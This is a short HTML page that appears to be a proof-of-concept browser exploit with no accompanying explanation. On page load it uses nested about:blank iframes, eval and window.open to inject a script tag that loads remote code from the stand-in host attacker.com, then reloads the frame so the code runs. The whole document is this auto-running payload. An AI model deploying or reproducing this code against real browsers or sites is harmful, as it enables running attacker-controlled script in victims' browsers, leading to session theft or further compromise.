<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGYZYmLGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGYZYmLGGGGG.onload=_=>GGGGGYZYmLGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGYZYmLGGG src=about:blank><\/iframe><script>GGGYZYmLGGG.onload=_=>GGGYZYmLGGG.contentDocument.body.innerHTML+=\x22<script src=https://attacker.com/static/static.js><\\/script>\x22;GGGYZYmLGGG.contentWindow.location.reload();<\/script>');");GGGGGYZYmLGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>